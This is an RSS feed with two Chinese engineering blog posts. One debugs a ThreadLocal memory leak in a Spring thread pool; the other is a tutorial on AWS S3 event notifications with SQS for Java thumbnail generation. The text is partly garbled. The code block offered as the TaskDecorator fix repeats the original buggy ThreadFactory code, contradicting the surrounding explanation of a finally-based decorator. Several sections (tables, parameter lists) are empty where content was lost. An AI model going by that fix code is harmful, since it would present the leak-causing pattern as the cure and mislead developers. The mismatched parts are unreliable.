Untitled RSS Feed

记一次线上 Full GC 排查：线程池 + ThreadLocal 引发的内存泄漏

微鲤技术团队 — Tue, 31 Mar 2026 09:00:41 GMT

文章记录了项目中遇到的一个线上问题--线上服务持续Full GC，最终定位到是 ThreadLocal 在线程池场景下的内存泄漏。问题本身不复杂，但排查过程中涉及到 JVM 内存模型、GC 机制、ThreadLocal 底层实现、线程池源码等多个知识点。

1. 背景

那天是个周末，我照例做生产环境巡检，打开监控大盘一看，bill 服务的 GC 指标不太对劲——Full GC 的频率明显升高，而且看趋势没有收敛的迹象。

虽说 Full GC 偶尔出现一两次也不算什么大事，但连续触发就不正常了。于是我把 GC 日志捞了下来，丢到 GCeasy 上做了一次分析。

GC 日志分析

GCeasy 的分析结果非常直观——老年代（Old Generation）的内存使用量一直在爬坡，从大约 300MB 稳步上升到接近 500MB，before GC 和 after GC 的曲线几乎是贴着往上走的，GC 回收后的内存基本没怎么释放。
这条平稳上升的曲线，几乎就是内存泄漏的标志性特征。

简单解释一下这里的判断依据：正常情况下，Full GC 之后老年代的内存应该会有明显下降（因为不再被引用的对象被回收了）。但如果 GC 后内存几乎不降，说明老年代里有大量对象仍然被强引用持有，GC 想回收但回收不了——这就是典型的内存泄漏表现。

为什么是老年代？

这里顺便聊一下 JVM 的分代模型。在 HotSpot JVM 中，堆内存分为年轻代和老年代：

年轻代（Young Generation）：新创建的对象优先分配在这里，经过若干次 Minor GC 仍然存活的对象会被晋升到老年代

老年代（Old Generation）：存放长期存活的对象，Full GC 时才会被回收

泄漏对象之所以最终堆积在老年代，是因为它们一直被引用，每次 Minor GC 都无法回收，年龄不断增长直到晋升。一旦大量泄漏对象进入老年代，就会导致老年代空间不断被挤占，最终触发 Full GC。而 Full GC 又回收不了这些对象，就形成了频繁 Full GC 的恶性循环。

2. 堆转储分析：MAT 定位泄漏源

既然怀疑是内存泄漏，那就得上 heap dump + MAT（Eclipse Memory Analyzer Tool）了。

我在生产环境 dump 了一份堆快照文件（.hprof），用 MAT 打开后，先看了一眼 Dominator Tree（支配树）。结果一目了然：排在前面的几个线程对象，每个都持有了大量的 PriceVO$SkuPriceVO对象，而且这些对象全部挂在 ThreadLocal 上。 展开其中一个线程的引用链：

java.lang.Thread  
  └── threadLocals: java.lang.ThreadLocal$ThreadLocalMap
        └── table: java.lang.ThreadLocal$ThreadLocalMap$Entry[]
              └── [n]: Entry
                    └── value: java.util.concurrent.ConcurrentHashMap
                          └── key: String (cacheKey)
                          └── value: List   // 大量泄漏对象

到这里，问题的轮廓已经很清晰了：ThreadLocal 中缓存的对象没有被及时清理，随着请求的不断到来，缓存数据越积越多，最终导致内存泄漏。

ThreadLocal 为什么容易泄漏？

这里有必要深入聊一下 ThreadLocal 的内存模型。

每个 Thread对象内部都维护了一个 ThreadLocalMap，它是一个以 ThreadLocal实例为 key、以实际存储值为 value 的散列表。特别的是，key 是一个 弱引用（WeakReference），但 value 是 强引用。

Thread  
  └── ThreadLocal.ThreadLocalMap threadLocals
        └── Entry[] table
              └── Entry extends WeakReference>
                    key  → ThreadLocal 实例 (弱引用)
                    value → 实际存储的对象  (强引用)

在普通场景下（每个请求一个线程，用完即销毁），ThreadLocal 不会有什么问题，因为线程死亡后整个ThreadLocalMap都会被 GC 回收。

但在线程池场景下就不一样了。线程池中的线程是复用的，一个线程处理完一个任务后不会被销毁，而是继续等待下一个任务。这意味着线程对象一直存活，它内部的ThreadLocalMap也一直存活，value 就永远不会被回收。

如果每次任务执行时都往 ThreadLocal 里塞数据，但执行完后又不清理，那这些数据就会一直在线程的 ThreadLocalMap里面累积，直到把内存撑爆——这就是经典的 ThreadLocal + 线程池内存泄漏模式。

3. 代码审查：找到写入点和"形同虚设"的清理逻辑

接下来就是 review 代码了。很快就找到了数据写入 ThreadLocal 的地方——在一个价格过滤方法中：关键逻辑如下：

public List listFilterNoCost(Long customerId, Long warehouseId,  
                                                   Long corpId, List<...> skuUnitList) {
    // 先从 ThreadLocal 缓存中取，有则直接返回
    String cacheKey = cacheHashCode(dto);
    Collection avgPriceList = ScopeCacheUtil.get(cacheKey);
    if (CollectionUtils.isEmpty(avgPriceList)) {
        avgPriceList = listSkuAvgPrice(dto);
        ScopeCacheUtil.put(cacheKey, avgPriceList);  // 写入 ThreadLocal
    }
    // ... 过滤逻辑
}

这段代码的意图是用 ThreadLocal 做一个"请求级别"的本地缓存——同一个请求内，相同参数的价格查询结果缓存起来，避免重复调用下游服务。思路没问题，但必须在任务执行完后清理掉。

然后我找到了线程池的配置代码，发现确实有清理 ThreadLocal 的逻辑： 核心配置代码：

public ThreadPoolTaskExecutor taskExecutor() {  
    ThreadPoolTaskExecutor executor = new ThreadPoolTaskExecutor();
    executor.setThreadFactory(r -> {
        Thread thread = new Thread(new ContextRelatedRunnable() {
            @Override
            public void doRun() {
                r.run();
                ScopeCacheUtil.clearContext();  // 清理 ThreadLocal
            }
        });
        // ...
        return thread;
    });
    return executor;
}

看起来没啥问题对吧？在doRun()方法里，先执行任务r.run()，然后调用 ScopeCacheUtil.clearContext()清理。

但我在本地加了断点调试后发现——clearContext()这行代码根本就没执行过！

本地 MAT 分析也验证了这一点，ThreadLocal 中的对象依然在不断累积：

4. 根因分析：ThreadFactory 中的 r 到底是什么？

这就是整个问题最有意思的地方了。

调试时我仔细看了一下 setThreadFactory(r -> { ... })中这个参数 r 的运行时类型，发现它不是我们提交的业务 Runnable，而是 java.util.concurrent.ThreadPoolExecutor$Worker对象。

r = {ThreadPoolExecutor$Worker@24132}  
    "java.util.concurrent.ThreadPoolExecutor$Worker@52875e40[State = -1, empty queue]"

这下一切都说得通了。

线程池的内部运作机制

要理解这个问题，需要了解 ThreadPoolExecutor的核心机制。线程池内部有一个 Worker 类：

private final class Worker extends AbstractQueuedSynchronizer implements Runnable {  
    final Thread thread;
    Runnable firstTask;

    public void run() {
        runWorker(this);
    }
}

Worker本身就是一个 Runnable。当线程池需要创建新线程时，会通过 ThreadFactory.newThread(Runnable r)创建线程，但这里传入的r不是用户提交的任务，而是Worker对象本身。

Worker.run()方法内部调用 runWorker(this)，这是一个循环——它会不断地从任务队列中取出任务并执行。换句话说，Worker是线程的"引擎"，它的 run()方法在线程存活期间几乎不会返回（除非线程池关闭或线程被回收）。

所以原来代码中的清理逻辑：

r.run();                            // Worker.run() → runWorker() 循环  
ScopeCacheUtil.clearContext();      // 几乎永远不会执行到这里！

r.run()就是启动了 Worker 的工作循环，这个循环会一直跑下去，clearContext()在后面等着，但永远轮不到它执行。就好比你在一个死循环后面写了一行代码——编译器不报错，但它就是跑不到。

这也是为什么这个 bug 隐藏了这么久：代码看起来逻辑完整，清理操作确实写了，但就是不生效。

5. 解决方案：使用 TaskDecorator

找到了根因，修复方案也就明确了。我们需要的是在每个任务执行前后做 hook，而不是在线程创建时做 hook。

Spring 的ThreadPoolTaskExecutor提供了一个非常优雅的扩展点——TaskDecorator。它的作用是对提交到线程池的每一个任务进行装饰（包装），可以在任务执行前后添加自定义逻辑：

public ThreadPoolTaskExecutor taskExecutor() {  
    ThreadPoolTaskExecutor executor = new ThreadPoolTaskExecutor();
    executor.setThreadFactory(r -> {
        Thread thread = new Thread(new ContextRelatedRunnable() {
            @Override
            public void doRun() {
                r.run();
                ScopeCacheUtil.clearContext();  // 清理 ThreadLocal
            }
        });
        // ...
        return thread;
    });
    return executor;
}

这里用了 Java 8 的 Lambda 语法，本质上就是返回一个新的Runnable，它在 finally 块中确保无论任务正常完成还是抛出异常，都会执行 clearContext()清理 ThreadLocal。

调试验证：使用TaskDecorator 后，runnable参数的运行时类型是 CompletableFuture$AsyncRun——这才是我们真正的业务任务对象。每个任务执行完成后，finally块都能正确执行，ThreadLocal 被及时清理，内存不再泄漏。把原来 ThreadFactory 中无效的清理代码删掉，只保留 TaskDecorator 的方案，修复完成。

6. 延伸思考

6.1 ThreadFactory vs TaskDecorator：职责边界

这个 bug 的本质其实是混淆了 ThreadFactory 和 TaskDecorator 的职责：一句话总结：线程级别的设置用 ThreadFactory，任务级别的 hook 用 TaskDecorator。

6.2 ThreadLocal 使用的最佳实践
经过这次踩坑，我总结了几条在线程池场景下使用 ThreadLocal 的原则：

1.用完必清理：在 finally块中调用 ThreadLocal.remove()，就像用完数据库连接要关闭一样

2.优先用 TaskDecorator 兜底：即使业务代码里写了remove()，线程池层面也加一层保险

3.考虑替代方案：如果只是想在一个调用链中传递数据，可以考虑用方法参数显式传递，或者使用TransmittableThreadLocal（阿里开源）来解决跨线程池传递的问题

4.监控 + 巡检：定期关注 GC 日志和堆内存趋势，早发现早处理

6.3 排查内存泄漏的通用思路

最后梳理一下排查内存泄漏的一般套路，权当留个备忘：

1. 发现异常  
   └── 监控告警 / 巡检发现 Full GC 频繁

2. 确认泄漏  
   └── 分析 GC 日志（GCeasy / GCViewer）
   └── 观察 Old 代内存趋势：GC 后是否回落

3. 定位泄漏对象  
   └── jmap -dump 导出堆快照
   └── MAT 分析：Leak Suspects / Dominator Tree / Histogram
   └── 找到占用内存最大的对象及其 GC Root 引用链

4. 代码审查  
   └── 根据引用链找到代码中的写入点
   └── 检查是否有清理逻辑，清理逻辑是否真的生效

5. 修复 & 验证  
   └── 本地复现 + 断点调试
   └── 修复后观察内存趋势是否恢复正常

7. 总结

回过头看，这个问题的直接原因很简单——ThreadLocal 没清理导致内存泄漏。但真正有意思的是：代码里明明写了清理逻辑，看着完全没问题，实际上却从来没执行过。

这也是线上问题排查中常见的一种情况：不是没做，而是做了但没生效。写代码容易，验证它真的按预期工作，才是更重要的事。

如果你也在用线程池 + ThreadLocal 的组合，建议检查一下你的清理逻辑到底挂在了 ThreadFactory 还是 TaskDecorator 上——别让你的清理代码也成了"永远跑不到的那一行"。

作者介绍：

唐武高级服务端开发工程师

AWS S3 事件通知 + SQS 消息队列：Java 实现文件上传自动化处理的完整实战指南

微鲤技术团队 — Tue, 03 Mar 2026 03:23:29 GMT

摘要：在现代云原生应用中，文件上传后的自动化处理（如缩略图生成、格式转换、内容审核等）是一个极为常见的需求。本文以真实生产项目为基础，详细讲解如何利用 AWS S3 事件通知 + SQS 消息队列构建一套事件驱动架构，并在 Java（Spring）项目中实现完整的监听 → 过滤 → 异步处理链路，涵盖防循环触发、并发控制、内存安全等生产级关键细节。

一、背景与需求分析

1.1 业务场景

在我们的内容管理系统中，用户每天通过多种方式（Web 端直传、API 上传、后台批量导入等）向 S3 上传大量图片和视频文件。为了提升前端展示性能和用户体验，我们需要：

图片上传后：自动生成 WebP 格式的缩略图，减小页面加载体积
视频上传后：自动提取首帧作为封面图，供列表页展示
处理结果：缩略图统一存放到同桶的约定目录下，文件名带 _thumbnail标识

1.2 技术挑战

二、架构设计与方案对比

2.1 方案一：应用层手动发布事件（传统方案）

用户上传 → 应用代码发布事件 → 消息队列 → 消费处理

缺点：

需要在所有上传入口（Controller、Service、定时任务等）手动埋点发送事件
容易遗漏，尤其是直接通过 AWS Console 或 SDK 上传的场景
业务代码与缩略图逻辑强耦合

2.2 方案二：S3 事件通知 + SQS（推荐方案）

文件上传到 S3 → S3 自动发送事件通知 → SQS 队列 → Java 监听器消费 → 异步处理 → 结果回传 S3

优点：

无需修改任何上传代码，零侵入
覆盖所有上传方式（SDK、Console、CLI、跨账号复制等）完全解耦，可独立扩展
AWS 原生架构，成熟可靠

2.3 最终架构图

┌──────────────┐         ┌──────────────┐         ┌──────────────────────┐

│   客户端/API  │ upload  │    AWS S3    │  event  │     AWS SQS          │

│  (多种入口)   │ ──────→ │   Bucket     │ ──────→ │  标准队列             │

└──────────────┘         └──────────────┘         └──────────┬───────────┘

                                                             │ poll

                                                             ▼

                                                   ┌──────────────────┐

                                                   │ ThumbnailListener │

                                                   │ (@SqsListener)    │

                                                   └────────┬─────────┘

                                                            │ 过滤 + 构建事件

                                                            ▼

                                                   ┌──────────────────┐

                                                   │ 内部延迟队列       │

                                                   │ (SuishenQueue)    │

                                                   └────────┬─────────┘

                                                            │ 异步消费

                                                            ▼

                                                ┌───────────────────────┐

                                                │ ThumbnailEventHandler │

                                                │ (Semaphore 限流)       │

                                                └────────┬──────────────┘

                                                         │

                                          ┌──────────────┼──────────────┐

                                          ▼              ▼              ▼

                                     图片缩略图      视频首帧        不支持的类型

                                     (→ WebP)      (→ WebP)        (跳过)

                                          │              │

                                          ▼              ▼

                                   ┌────────────────────────┐

                                   │  上传到 S3 thumbnails    │

                                   │  目录                    │

                                   └────────────────────────┘

三、AWS 侧配置详解

3.1 创建 SQS 队列

1.点击 "创建队列"
2.队列类型：标准队列（Standard Queue）
3.队列名称：s3-upload-thumbnail-notifications
4.关键参数配置：
5.记录队列 URL（后续配置需要），格式如：

https://sqs.us-west-2.amazonaws.com/514246740424/s3-upload-thumbnail-notifications

3.2 配置 SQS 访问策略

在队列的 "访问策略"中添加以下策略，允许 S3 服务向该队列发送消息：

{

  "Version": "2012-10-17",

  "Statement": [

    {

      "Sid": "AllowS3ToSendMessage",

      "Effect": "Allow",

      "Principal": {

        "Service": "s3.amazonaws.com"

      },

      "Action": "SQS:SendMessage",

      "Resource": "arn:aws:sqs:us-west-2:514246740424:s3-upload-thumbnail-notifications",

      "Condition": {

        "ArnLike": {

          "aws:SourceArn": "arn:aws:s3:::your-bucket-name"

        }

      }

    }

  ]

}

安全提示：Condition中的 aws:SourceArn限制了只有指定的 S3 桶才能发送消息，务必配置，防止其他桶的消息混入。

3.3 配置 S3 事件通知

进入 S3 桶 → 属性→ 事件通知→ 创建事件通知：防循环关键点：如果你的缩略图也上传到同一个桶，强烈建议配置前缀过滤或后缀排除，从 AWS 层面就避免缩略图文件触发新事件。

3.4 S3 事件通知消息格式

当文件上传到 S3 时，AWS 自动发送如下 JSON 消息到 SQS：

{

  "Records": [

    {

      "eventVersion": "2.1",

      "eventSource": "aws:s3",

      "awsRegion": "us-west-2",

      "eventTime": "2026-02-11T10:00:00.000Z",

      "eventName": "ObjectCreated:Put",

      "s3": {

        "bucket": {

          "name": "your-bucket-name",

          "arn": "arn:aws:s3:::your-bucket-name"

        },

        "object": {

          "key": "growth/original/photo.jpg",

          "size": 1024000,

          "eTag": "abc123def456",

          "sequencer": "0A1B2C3D4E5F6789"

        }

      }

    }

  ]

}

关键字段说明：

eventName：事件类型，用于过滤（如只处理 ObjectCreated:*）
s3.bucket.name：桶名，用于后续 S3 操作
s3.object.key：对象键（文件路径），注意是URL 编码的，代码中需要解码
s3.object.size：文件大小（字节），可用于过滤超大文件

四、Java 代码实现详解

4.1 Maven 依赖配置





    

        

            software.amazon.awssdk

            bom

            2.20.157

            pom

            import

        

    






    

    

        software.amazon.awssdk

        s3

    


    

    

        software.amazon.awssdk

        sqs

    


    

    

        com.amazonaws

        aws-java-sdk-sqs

        1.12.529

    


    

    

        io.awspring.cloud

        spring-cloud-aws-messaging

        2.4.4

    


    

    

        net.coobird

        thumbnailator

        0.4.21

    


    

    

        org.sejda.imageio

        webp-imageio

        0.1.6

说明：项目同时使用了 AWS SDK v1（Spring Cloud AWS 依赖）和 v2（S3 操作），这是因为 spring-cloud-aws-messaging 2.x底层依赖 v1 的 SQS 客户端。如果使用 Spring Cloud AWS 3.x，则可以统一到 v2。

4.2 应用配置文件

# ============ AWS 基础配置 ============

aws.s3.accessKey=YOUR_ACCESS_KEY

aws.s3.secretKey=YOUR_SECRET_KEY

aws.s3.region=us-west-2


# ============ SQS 缩略图队列配置 ============

# 是否启用 SQS 监听（可作为总开关）

aws.sqs.thumbnail.enabled=true

# SQS 队列 URL

aws.sqs.thumbnail.queue.url=https://sqs.us-west-2.amazonaws.com/514246740424/s3-upload-thumbnail-notifications


# ============ 缩略图生成配置 ============

# 缩略图质量（0.0-1.0，值越小文件越小）

aws.s3.thumbnail.quality=0.3

# 是否保留原始尺寸（仅压缩质量）

aws.s3.thumbnail.keep.original.size=true

# 是否启用内存监控（生产环境建议开启）

aws.s3.thumbnail.memory.monitor.enabled=true

4.3 条件化加载：SqsEnabledCondition

在非 Spring Boot 环境（如传统 Spring MVC 项目）中，我们需要自定义 Condition来控制 Bean 的创建：

@Slf4j

public class SqsEnabledCondition implements Condition {


    @Override

    public boolean matches(ConditionContext context, AnnotatedTypeMetadata metadata) {

        String enabled = null;


        // 方式1: 尝试从 Spring Environment 读取

        Environment env = context.getEnvironment();

        if (env != null) {

            enabled = env.getProperty("aws.sqs.thumbnail.enabled");

        }


        // 方式2: 直接读取 classpath 下的配置文件（兜底）

        if (enabled == null && context.getResourceLoader() != null) {

            Resource resource = context.getResourceLoader()

                .getResource("classpath:config.properties");

            if (resource.exists()) {

                Properties props = new Properties();

                try (InputStream is = resource.getInputStream()) {

                    props.load(is);

                    enabled = props.getProperty("aws.sqs.thumbnail.enabled");

                }

            }

        }


        boolean result = "true".equalsIgnoreCase(enabled);

        log.info("SQS 条件判断: aws.sqs.thumbnail.enabled={}, Bean创建决策: {}",

                enabled, result ? "创建" : "跳过");

        return result;

    }

}

设计意图：

通过配置开关控制整个 SQS 监听链路是否启用
支持多环境差异化配置（开发环境关闭，生产环境开启）
双重读取策略兼容不同的 Spring 配置加载方式

4.4 SQS 配置类：AwsSqsConfig

@Slf4j

@Configuration

public class AwsSqsConfig {


    @Value("${aws.s3.accessKey}")

    private String awsAccessKey;


    @Value("${aws.s3.secretKey}")

    private String awsSecretKey;


    @Value("${aws.s3.region:us-west-2}")

    private String awsRegion;


    /**

     * 创建 SQS 异步客户端

     */

    @Bean

    @Conditional(SqsEnabledCondition.class)

    public AmazonSQSAsync amazonSQSAsync() {

        BasicAWSCredentials credentials =

            new BasicAWSCredentials(awsAccessKey, awsSecretKey);


        return AmazonSQSAsyncClientBuilder.standard()

                .withRegion(Regions.fromName(awsRegion))

                .withCredentials(new AWSStaticCredentialsProvider(credentials))

                .build();

    }


    /**

     * 创建消息监听容器

     * 这是 Spring Cloud AWS 的核心组件，负责从 SQS 拉取消息并分发给 @SqsListener 方法

     */

    @Bean

    @Conditional(SqsEnabledCondition.class)

    public SimpleMessageListenerContainer simpleMessageListenerContainer(

            AmazonSQSAsync amazonSQSAsync,

            QueueMessageHandler queueMessageHandler) {


        SimpleMessageListenerContainer container = new SimpleMessageListenerContainer();

        container.setAmazonSqs(amazonSQSAsync);

        container.setMessageHandler(queueMessageHandler);

        container.setMaxNumberOfMessages(10);  // 每次最多拉取 10 条消息

        container.setWaitTimeout(20);           // 长轮询 20 秒

        return container;

    }


    /**

     * 创建消息处理器

     */

    @Bean

    @Conditional(SqsEnabledCondition.class)

    public QueueMessageHandler queueMessageHandler(AmazonSQSAsync amazonSQSAsync) {

        QueueMessageHandlerFactory factory = new QueueMessageHandlerFactory();

        factory.setAmazonSqs(amazonSQSAsync);

        return factory.createQueueMessageHandler();

    }

}

关键配置说明：

长轮询 vs 短轮询：设置 aitTimeout > 0即启用长轮询。SQS 会等待至有消息到达或超时才返回，比短轮询（立即返回空）节省大量请求费用。

4.5 S3 事件消息模型：S3EventNotification

@Data

public class S3EventNotification {


    @JsonProperty("Records")

    private List records;


    @Data

    public static class S3EventRecord {

        @JsonProperty("eventVersion")

        private String eventVersion;


        @JsonProperty("eventSource")

        private String eventSource;


        @JsonProperty("awsRegion")

        private String awsRegion;


        @JsonProperty("eventTime")

        private String eventTime;


        @JsonProperty("eventName")

        private String eventName;


        @JsonProperty("s3")

        private S3Entity s3;

    }


    @Data

    public static class S3Entity {

        @JsonProperty("bucket")

        private S3Bucket bucket;


        @JsonProperty("object")

        private S3Object object;

    }


    @Data

    public static class S3Bucket {

        @JsonProperty("name")

        private String name;


        @JsonProperty("arn")

        private String arn;

    }


    @Data

    public static class S3Object {

        @JsonProperty("key")

        private String key;


        @JsonProperty("size")

        private Long size;


        @JsonProperty("eTag")

        private String eTag;


        @JsonProperty("sequencer")

        private String sequencer;

    }

}

注意：S3 事件通知的 JSON 字段使用 PascalCase（如 Records），而 Java 习惯camelCase，因此使用 @JsonProperty做映射。

4.6 核心监听器：ThumbnailListener

这是整个系统的入口组件，负责接收 SQS 消息、解析、过滤并分发：

@Slf4j

@Component

@Conditional(SqsEnabledCondition.class)

public class ThumbnailListener {


    @Resource

    private RedisIdService redisIdService;


    @Value("${aws.s3.thumbnail.enabled:true}")

    private boolean thumbnailEnabled;


    // 支持的图片格式

    private static final String[] IMAGE_EXTENSIONS = {

        ".jpg", ".jpeg", ".png", ".gif", ".bmp",

        ".webp", ".tiff", ".tif", ".jfif", ".ico"

    };


    // 支持的视频格式

    private static final String[] VIDEO_EXTENSIONS = {

        ".mp4", ".mov", ".avi", ".mkv", ".webm", ".flv", ".wmv",

        ".mpg", ".mpeg", ".m4v", ".3gp", ".3g2",

        ".ogv", ".vob", ".rm", ".rmvb", ".ts", ".mts", ".m2ts", ".f4v", ".qt"

    };


    @PostConstruct

    public void init() {

        log.info("ThumbnailListener 初始化成功, thumbnailEnabled={}", thumbnailEnabled);

        log.info("支持的图片格式({}个), 视频格式({}个)",

                IMAGE_EXTENSIONS.length, VIDEO_EXTENSIONS.length);

    }


    /**

     * 监听 SQS 消息

     * deletionPolicy = ON_SUCCESS:方法正常返回时自动删除消息，抛异常则不删除（可重试）

     */

    @SqsListener(

        value = "${aws.sqs.thumbnail.queue.url}",

        deletionPolicy = SqsMessageDeletionPolicy.ON_SUCCESS

    )

    public void handleS3Event(String message) {

        try {

            // 【快速预检查】在 JSON 解析前，先做字符串级别的快速过滤

            if (message.contains("_thumbnail.")) {

                log.info("快速过滤：跳过缩略图消息");

                return;

            }


            // 解析 S3 事件通知

            S3EventNotification notification =

                JSON.parseObject(message, S3EventNotification.class);


            if (notification == null || notification.getRecords() == null) {

                log.info("无效的 S3 事件消息");

                return;

            }


            // 逐条处理事件记录

            for (S3EventNotification.S3EventRecord record : notification.getRecords()) {

                processS3Event(record);

            }


        } catch (Exception e) {

            log.error("处理 SQS 消息失败: {}", e.getMessage(), e);

            // 抛出异常 → 消息不被删除 → SQS 在可见性超时后重新投递

            throw new RuntimeException("处理失败", e);

        }

    }


    private void processS3Event(S3EventNotification.S3EventRecord record) {

        String eventName = record.getEventName();


        // ① 只处理对象创建事件

        if (!eventName.startsWith("ObjectCreated:")) {

            return;

        }


        S3EventNotification.S3Object s3Object = record.getS3().getObject();

        String bucketName = record.getS3().getBucket().getName();

        String objectKey = URLDecoder.decode(s3Object.getKey(), "UTF-8");


        // ② 检查功能开关

        if (!thumbnailEnabled) {

            log.info("缩略图生成已禁用，跳过: {}", objectKey);

            return;

        }


        // ③ 跳过缩略图文件（防循环）

        if (isThumbnailFile(objectKey)) {

            log.info("跳过缩略图文件: {}", objectKey);

            return;

        }


        // ④ 过滤超大文件（>500MB）

        Long fileSize = s3Object.getSize();

        if (fileSize != null && fileSize > 500 * 1024 * 1024L) {

            log.info("文件超过500MB限制，跳过: key={}", objectKey);

            return;

        }


        // ⑤ 判断文件类型

        String fileType = determineFileTypeByKey(objectKey);

        if (!"image".equals(fileType) && !"video".equals(fileType)) {

            return;

        }


        // ⑥ 构建事件并发送到内部异步队列

        ThumbnailEvent event = ThumbnailEvent.builder()

                .id(redisIdService.generate(ThumbnailEvent.class))

                .bucketName(bucketName)

                .objectKey(objectKey)

                .fileType(fileType)

                .fileSize(fileSize)

                .eventName(eventName)

                .eventTime(System.currentTimeMillis())

                .build();


        SourceEventQueueManager.add(event);

        log.info("已发送缩略图生成事件: key={}, type={}", objectKey, fileType);

    }


    // ... isThumbnailFile() 和 determineFileTypeByKey() 方法

}

@SqsListener 注解详解

@SqsListener(

    value = "${aws.sqs.thumbnail.queue.url}",   // 支持 SpEL 表达式读取配置

    deletionPolicy = SqsMessageDeletionPolicy.ON_SUCCESS  // 删除策略

)

删除策略选项：

4.7 事件模型：ThumbnailEvent

@Data

@Builder

@NoArgsConstructor

@AllArgsConstructor

@Accessors(chain = true)

@SuishenQueue(

    type = SuishenQueueTypeEnum.DELAY,     // 延迟队列类型

    handler = ThumbnailEventHandler.class,  // 指定处理器

    groupCount = 3,                         // 3 个消费者组

    delayTime = 200                         // 200ms 延迟

)

public class ThumbnailEvent implements SourceEvent {

    private Long id;           // 事件 ID（Redis 生成，保证幂等性）

    private String bucketName; // S3 桶名

    private String objectKey;  // 文件路径

    private String fileType;   // image / video

    private Long fileSize;     // 文件大小（字节）

    private String eventName;  // ObjectCreated:Put 等

    private Long eventTime;    // 事件时间戳

}

设计亮点：

使用 @SuishenQueue注解接入内部延迟队列框架，实现二级缓冲
groupCount = 3 配合 Semaphore(2)实现精细化并发控制
delayTime = 200ms 微延迟可有效聚合短时间内的批量上传事件

4.8 异步处理器：ThumbnailEventHandler

@Slf4j

@SuishenLog(logName = "缩略图生成")

@Service

public class ThumbnailEventHandler extends BaseSourceEventHandler {


    /**

     * 并发控制信号量

     * 图像处理是内存密集型操作，限制同时处理数量防止 Native Memory OOM

     */

    private static final Semaphore IMAGE_PROCESS_SEMAPHORE = new Semaphore(2);

    private static final int SEMAPHORE_TIMEOUT_SECONDS = 60;


    @Value("${aws.s3.thumbnail.quality:0.3}")

    private double thumbnailQuality;


    @Override

    protected boolean doHandle(ThumbnailEvent event) {

        boolean acquired = false;

        try {

            // 获取信号量（带超时）

            acquired = IMAGE_PROCESS_SEMAPHORE.tryAcquire(

                SEMAPHORE_TIMEOUT_SECONDS, TimeUnit.SECONDS);


            if (!acquired) {

                log.warn("信号量获取超时，跳过处理: {}", event.getObjectKey());

                return true;

            }


            String fileUrl = "https://static.weryai.com/" + event.getObjectKey();

            int lastSlash = event.getObjectKey().lastIndexOf("/");

            String directory = event.getObjectKey().substring(0, lastSlash);


            if ("image".equalsIgnoreCase(event.getFileType())) {

                // 图片：调用远程服务生成 WebP 缩略图

                ImageCompressUtils.generateImageThumbnail(

                    fileUrl,

                    (int) Math.round(thumbnailQuality * 100),

                    directory

                );

            } else if ("video".equalsIgnoreCase(event.getFileType())) {

                // 视频：提取首帧并转为 WebP

                ImageCompressUtils.generateVideoFirstFrame(

                    fileUrl,

                    (int) Math.round(thumbnailQuality * 100),

                    directory

                );

            }


            return true;


        } catch (InterruptedException e) {

            Thread.currentThread().interrupt();

            return true;

        } catch (Exception e) {

            log.error("缩略图生成失败: {}", event.getObjectKey(), e);

            return true; // 返回 true 避免无限重试

        } finally {

            if (acquired) {

                IMAGE_PROCESS_SEMAPHORE.release();

            }

        }

    }

}

五、生产环境关键设计

5.1 防循环触发：三层防护机制

这是本方案中最重要的安全设计。缩略图生成后会上传回 S3，如果不做处理，会再次触发事件，形成无限循环。

┌─────────────────────────────────────────────────────────────────┐

│                      防循环三层防护                               │

├─────────────┬───────────────────────────────────────────────────┤

│  第一层      │  AWS 层：S3 事件通知前缀/后缀过滤                   │

│  (最外层)    │  只监听 growth/original/ 目录，缩略图写入其他目录     │

├─────────────┼───────────────────────────────────────────────────┤

│  第二层      │  应用层（快速预检查）：字符串匹配                     │

│  (中间层)    │  消息内容包含 "_thumbnail." 则直接跳过               │

├─────────────┼───────────────────────────────────────────────────┤

│  第三层      │  应用层（精确检查）：文件名模式匹配                   │

│  (最内层)    │  isThumbnailFile() 方法多规则判断                   │

└─────────────┴───────────────────────────────────────────────────┘

isThumbnailFile()的具体实现：

private boolean isThumbnailFile(String objectKey) {

    if (StringUtils.isBlank(objectKey)) return false;


    String lowerKey = objectKey.toLowerCase();


    // 规则1: 包含 _thumbnail. 标识

    if (lowerKey.contains("_thumbnail.")

            || lowerKey.endsWith("_thumbnail.webp")) {

        return true;

    }


    // 规则2: 文件名以 _thumbnail 结尾且扩展名为 .webp

    if (lowerKey.endsWith(".webp")) {

        String fileName = objectKey.substring(objectKey.lastIndexOf('/') + 1);

        fileName = fileName.substring(0, fileName.lastIndexOf('.'));

        if (fileName.endsWith("_thumbnail")) {

            return true;

        }

    }


    return false;

}

5.2 并发控制：Semaphore 限流

图片/视频处理是资源密集型操作，BufferedImage的像素数据存储在堆外内存（Native Memory）中，不受 JVM 堆大小限制，容易导致 OOM。

// 4C8G 服务器推荐并发数为 2

private static final Semaphore IMAGE_PROCESS_SEMAPHORE = new Semaphore(2);

为什么使用 Semaphore 而不是线程池大小控制？

并发数推荐：

5.3 消息删除策略与重试机制

消息处理成功 → 自动删除（ON_SUCCESS 策略）

消息处理失败（抛异常） → 不删除 → 可见性超时后重新可见 → 重试

消息处理失败（返回 true） → 自动删除 → 不重试

代码中的策略选择：

handleS3Event()

方法中：未知异常抛出 → 消息重试
ThumbnailEventHandler.doHandle()中：处理失败返回 true → 不重试（因为是已知的处理错误，重试大概率也会失败）

5.4 消息处理的幂等性

通过 Redis 生成唯一事件 ID：

.id(redisIdService.generate(ThumbnailEvent.class))

结合内部队列框架的去重机制，确保同一文件不会被处理两次。

六、监控、运维与故障排查

6.1 运行日志关键标记

# 查看监听器初始化

grep "ThumbnailListener 初始化成功" logs/application.log


# 查看消息接收情况

grep "检测到新文件上传" logs/application.log


# 查看处理结果

grep "缩略图生成成功\|缩略图生成失败" logs/application.log


# 查看信号量等待

grep "信号量" logs/application.log

6.2 AWS CloudWatch 监控指标

6.3 常见问题排查表

7.3 进阶优化建议

八、总结与最佳实践

核心架构回顾

S3 文件上传 → S3 事件通知 → SQS 队列 → @SqsListener 监听

→ 多层过滤（防循环/大小/类型）→ 内部延迟队列 → Semaphore 限流

→ 缩略图生成 → 回传 S3

最佳实践清单

1.使用 SQS 标准队列而非 FIFO 队列 — 缩略图生成不需要严格顺序，标准队列吞吐量更高且更便宜

2.启用长轮询（waitTimeout=20）— 节省 API 费用，降低空请求

3.配置消息删除策略为 ON_SUCCESS— 处理成功才删除，失败可重试

4.三层防循环机制 — AWS 层 + 快速预检 + 精确过滤，确保万无一失

5.Semaphore 并发控制 — 防止图像处理导致 Native Memory OOM

6.二级队列缓冲 — SQS → 内部延迟队列，平滑突发流量

